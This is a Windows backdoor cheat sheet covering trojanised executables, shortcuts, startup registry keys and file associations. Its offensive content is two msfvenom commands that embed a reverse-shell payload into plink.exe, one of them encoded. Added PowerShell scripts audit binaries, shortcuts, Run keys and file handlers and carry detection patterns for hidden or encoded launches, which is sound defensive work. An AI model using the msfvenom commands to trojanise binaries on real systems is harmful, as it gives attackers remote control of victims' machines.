Backdoors

Backdoor Cheat Sheet

Methods

  1. Creating EXE Files

  2. Backdooring Shortcuts

  3. Startup Scripts

  4. Backdooring file associations


Create an EXE file

msfvenom

# Without encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -f exe -o plink-malicious.exe

# With encoding
sudo msfvenom -a x64 --platform windows -x /usr/share/windows-binaries/plink.exe -k -p windows/x64/shell_reverse_tcp LHOST=192.168.56.20 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai -i 4 -f exe -o plink-malicious.exe
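A template-injected binary built with `-x` and `-k` keeps the original program's behaviour, so the way to catch one on a host is to compare it with a known-good copy rather than to watch it run. The following PowerShell function is an added example, not part of the original cheat sheet: it hashes a file, checks its Authenticode signature and reports the findings. The file path and the reference hash are placeholders to be replaced with the vendor-published values.

```powershell
# Added example (defensive check), not part of the original cheat sheet.
# Verifies a Windows binary against a known-good SHA256 and its Authenticode
# signature. The path and reference hash below are placeholders.
function Test-BinaryIntegrity {
    param(
        [Parameter(Mandatory)] [string] $Path,
        [string] $KnownGoodSha256 = '<SHA256 OF THE VENDOR-SUPPLIED BINARY>'   # placeholder
    )
    if (-not (Test-Path -Path $Path)) { throw "File not found: $Path" }

    $hash     = (Get-FileHash -Path $Path -Algorithm SHA256).Hash
    $sig      = Get-AuthenticodeSignature -FilePath $Path
    $findings = @()

    if ($KnownGoodSha256 -notmatch '^[0-9A-Fa-f]{64}$') {
        $findings += 'no reference hash supplied; hash comparison skipped'
    } elseif ($hash -ne $KnownGoodSha256.ToUpper()) {
        $findings += 'SHA256 differs from the known-good copy'
    }

    # Patching code into a signed PE invalidates the signature; an unsigned
    # binary is reported so the reviewer knows only the hash protects it.
    if ($sig.Status -ne 'Valid') {
        $findings += "Authenticode status is '$($sig.Status)'"
    }

    [pscustomobject]@{
        Path     = $Path
        Sha256   = $hash
        Status   = $sig.Status
        SignedBy = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        Findings = ($findings -join '; ')
        Trusted  = ($findings.Count -eq 0)
    }
}

# Usage (placeholder path and hash): compare the file on disk with the vendor's published hash.
Test-BinaryIntegrity -Path 'C:\Tools\plink.exe' -KnownGoodSha256 '<SHA256 OF THE VENDOR-SUPPLIED BINARY>' | Format-List
```

`Trusted` is only meaningful when a real reference hash is supplied; for tools that ship unsigned (many of the binaries under `/usr/share/windows-binaries` do), the hash comparison is the only check that carries weight.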

Backdooring Shortcuts

PowerShell

script.ps1

Modify the shortcut properties
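A backdoored shortcut keeps its name and icon but changes the target, arguments or window style. The script below is an added example rather than code from the original cheat sheet: it reads every `.lnk` under the desktop, Start Menu and Startup folders through the `WScript.Shell` COM object and reports shortcuts whose properties look like a hidden script launch. The folder list and the regular expressions are assumptions chosen for illustration.

```powershell
# Added example (defensive audit), not part of the original cheat sheet.
# Reads shortcut properties via WScript.Shell and flags suspicious ones.
$shell = New-Object -ComObject WScript.Shell

# Folders where a modified shortcut is most likely to be planted (assumed list)
$locations = @(
    [Environment]::GetFolderPath('Desktop'),
    [Environment]::GetFolderPath('CommonDesktopDirectory'),
    [Environment]::GetFolderPath('StartMenu'),
    [Environment]::GetFolderPath('CommonStartMenu'),
    [Environment]::GetFolderPath('Startup'),
    [Environment]::GetFolderPath('CommonStartup')
) | Where-Object { $_ -and (Test-Path -Path $_) }

# Heuristic patterns (assumed): interpreters as targets, hidden/encoded launches
$interpreterPattern = '(?i)\\(powershell|pwsh|cmd|wscript|cscript|mshta|rundll32|regsvr32)\.exe$'
$argumentPattern    = '(?i)-enc|-e |-ec |-ep |-nop|-noprofile|-w hidden|-windowstyle hidden|bypass|\.ps1|\biex\b|invoke-expression|downloadstring|frombase64'

function Get-ShortcutFindings {
    Get-ChildItem -Path $locations -Filter *.lnk -Recurse -ErrorAction SilentlyContinue | ForEach-Object {
        $lnk       = $shell.CreateShortcut($_.FullName)
        $target    = [string]$lnk.TargetPath
        $arguments = [string]$lnk.Arguments
        $iconExe   = ([string]$lnk.IconLocation -split ',')[0]
        $reasons   = @()

        if ($target -match $interpreterPattern)        { $reasons += 'target is a script interpreter' }
        if ($arguments -match $argumentPattern)        { $reasons += 'arguments resemble a hidden or encoded script launch' }
        if ($target -and -not (Test-Path -Path $target)) { $reasons += 'target does not exist' }
        # Icon kept from the original program while the target now points elsewhere
        if ($iconExe -and $target -and ($iconExe -ne $target) -and ($target -match $interpreterPattern)) {
            $reasons += 'icon borrowed from a different executable'
        }
        # WindowStyle 7 = minimised; normal application shortcuts rarely use it
        if ($lnk.WindowStyle -eq 7 -and $target -match $interpreterPattern) {
            $reasons += 'window minimised on launch'
        }

        if ($reasons.Count -gt 0) {
            [pscustomobject]@{
                Shortcut  = $_.FullName
                Target    = $target
                Arguments = $arguments
                Reasons   = ($reasons -join '; ')
            }
        }
    }
}

# Usage: list every shortcut that tripped at least one heuristic
Get-ShortcutFindings | Format-List
```

Run it as each interactive user, since per-user desktop and Start Menu folders differ; compare the `Target` and `Arguments` columns against what the shortcut's name suggests it should launch.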

Startup Scripts

Registry Editor
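The Run and RunOnce keys referenced in the first link under REFERENCES are the registry locations a startup-script backdoor typically writes to. As an added example (not code from the original cheat sheet), the script below enumerates those keys for both the machine and the current user, lists the Startup folders, and flags entries that launch an interpreter or run from a user-writable path. The key list and the heuristic pattern are assumptions chosen for illustration.

```powershell
# Added example (defensive audit), not part of the original cheat sheet.
# Enumerates registry autostart entries and Startup folders, flagging
# entries that look like a script backdoor.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
)

# Heuristic (assumed): interpreters at logon, encoded commands, user-writable paths
$suspiciousPattern = '(?i)powershell|pwsh|cmd\.exe|wscript|cscript|mshta|rundll32|regsvr32|-enc|-e |frombase64|\\Temp\\|\\AppData\\|\\Downloads\\|\\Public\\'
$providerProps     = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-StartupEntries {
    foreach ($key in $runKeys) {
        if (-not (Test-Path -Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($p.Name -in $providerProps) { continue }
            [pscustomobject]@{
                Location   = $key
                Name       = $p.Name
                Command    = [string]$p.Value
                Suspicious = ([string]$p.Value) -match $suspiciousPattern
            }
        }
    }

    # Scripts dropped into a Startup folder run at logon without any registry entry
    foreach ($folder in @([Environment]::GetFolderPath('Startup'), [Environment]::GetFolderPath('CommonStartup'))) {
        if (-not ($folder -and (Test-Path -Path $folder))) { continue }
        Get-ChildItem -Path $folder -File -ErrorAction SilentlyContinue | ForEach-Object {
            [pscustomobject]@{
                Location   = $folder
                Name       = $_.Name
                Command    = $_.FullName
                Suspicious = ($_.Extension -match '(?i)^\.(ps1|bat|cmd|vbs|js|hta)$') -or ($_.FullName -match $suspiciousPattern)
            }
        }
    }
}

# Usage: full inventory first, then the entries worth a second look
$entries = Get-StartupEntries
$entries | Sort-Object Suspicious -Descending | Format-Table -AutoSize -Wrap
$entries | Where-Object Suspicious | ForEach-Object {
    Write-Warning "Review autostart entry '$($_.Name)' in $($_.Location): $($_.Command)"
}
```

Legitimate per-user software (updaters installed under `AppData`) will also match the path heuristic, so treat the warnings as a review list and compare each command against the software inventory of the host.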

Backdooring file associations

backdoor.ps1

Registry Editor
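A file-association backdoor replaces the `shell\open\command` handler for a common extension so that opening an ordinary document runs a script first. The script below is an added example, not code from the original cheat sheet: it resolves the effective handler for a set of extensions, taking Explorer's per-user choice and the HKCU override into account, and flags commands that invoke an interpreter or run from a user-writable path. The extension list and the heuristic pattern are assumptions chosen for illustration.

```powershell
# Added example (defensive audit), not part of the original cheat sheet.
# Resolves the open handler for common extensions and flags suspicious ones.
$extensions        = @('.txt', '.pdf', '.jpg', '.png', '.docx', '.xlsx', '.html')
$classHives        = @('HKCU:\SOFTWARE\Classes', 'HKLM:\SOFTWARE\Classes')   # per-user registrations win
$suspiciousPattern = '(?i)powershell|pwsh|cmd\.exe|wscript|cscript|mshta|-enc|\.ps1|\.bat|\.vbs|\\Temp\\|\\AppData\\|\\Public\\'

function Get-DefaultValue([string]$key) {
    if (Test-Path -Path $key) { (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)' }
}

function Get-OpenCommands([string]$ext) {
    $progIds = @()
    # Explorer's per-user choice takes precedence over the class registration
    $userChoice = "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\$ext\UserChoice"
    if (Test-Path -Path $userChoice) {
        $p = (Get-ItemProperty -Path $userChoice -ErrorAction SilentlyContinue).ProgId
        if ($p) { $progIds += $p }
    }
    foreach ($hive in $classHives) {
        $p = Get-DefaultValue "$hive\$ext"
        if ($p) { $progIds += $p }
    }

    foreach ($hive in $classHives) {
        # Handlers on the ProgID, plus ones written directly under the extension key
        foreach ($sub in (@($progIds | Select-Object -Unique) + $ext)) {
            $cmdKey = "$hive\$sub\shell\open\command"
            $cmd = Get-DefaultValue $cmdKey
            if ($cmd) {
                [pscustomobject]@{
                    Extension  = $ext
                    Key        = $cmdKey
                    Command    = [string]$cmd
                    Suspicious = ([string]$cmd) -match $suspiciousPattern
                }
            }
        }
    }
}

function Get-AssociationFindings {
    foreach ($ext in $extensions) { Get-OpenCommands $ext }
}

# Usage: inventory every resolved handler, then warn on the suspicious ones
$results = Get-AssociationFindings
$results | Format-Table -AutoSize -Wrap
$results | Where-Object Suspicious | ForEach-Object {
    Write-Warning "Handler for $($_.Extension) at $($_.Key) runs: $($_.Command)"
}
```

Run the audit in the context of the affected user, because HKCU and the `UserChoice` key are per-user and are where a handler change made without administrative rights lands. Per-user installs such as browsers under `AppData\Local` will match the path heuristic and need to be allow-listed.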


REFERENCES

  • https://devblogs.microsoft.com/powershell/how-to-access-or-modify-startup-items-in-the-window-registry/

  • https://app.tidalcyber.com/technique/9cfbe3ba-957e-49fd-9494-9870e5d0ae16
